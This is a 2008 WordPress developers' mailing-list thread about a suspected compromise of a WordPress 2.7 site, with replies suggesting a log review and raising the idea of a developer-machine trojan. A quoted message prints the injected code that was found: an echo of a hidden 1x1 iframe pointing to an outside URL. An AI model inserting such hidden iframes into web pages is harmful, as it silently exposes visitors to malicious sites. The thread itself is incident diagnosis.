[wp-hackers] XSS vuln in wordpress 2.7 ?

Mike Schinkel mikeschinkel at gmail.com
Mon Dec 22 19:14:46 GMT 2008


What's the chance it is some kind of trojan on the developer's machine that
attaches the offending line to source code before it is uploaded?

Just thinking out loud...

-Mike

On Mon, Dec 22, 2008 at 2:06 PM, Jess Planck <jess at funroe.net> wrote:

> That sux. You started picking through your web logs to see if it came
> through your publicly accessible website? Sometimes you can check error and
> weblogs and look for unusual request strings to determine if the exploit
> came through a vulnerable web application. In some cases the intruder will
> cleanup behind themselves. Unfortunately sometimes the exploits don't
> produce anything log-able.
>
> If they do cleanup, you may notice missing times in log files. At least
> that can give you a time frame if you didn't figure that out from the
> modification stamp on the files.
>
> I didn't notice if you mentioned the server platform. Other WP-Hackers may
> be able to offer some diagnostic tools for your server type.
>
>
> On Dec 22, 2008, at 12:39 PM, madalin wrote:
>
> // echo "<iframe src=\"http://thedeadpit.com/?click=17470781\<http://thedeadpit.com/?click=17470781%5C>"
>> width=1
>> height=1 style=\"visibility:hidden;position:absolute\"></iframe>";
>>
>
>  _______________________________________________
> wp-hackers mailing list
> wp-hackers at lists.automattic.com
> http://lists.automattic.com/mailman/listinfo/wp-hackers
>


More information about the wp-hackers mailing list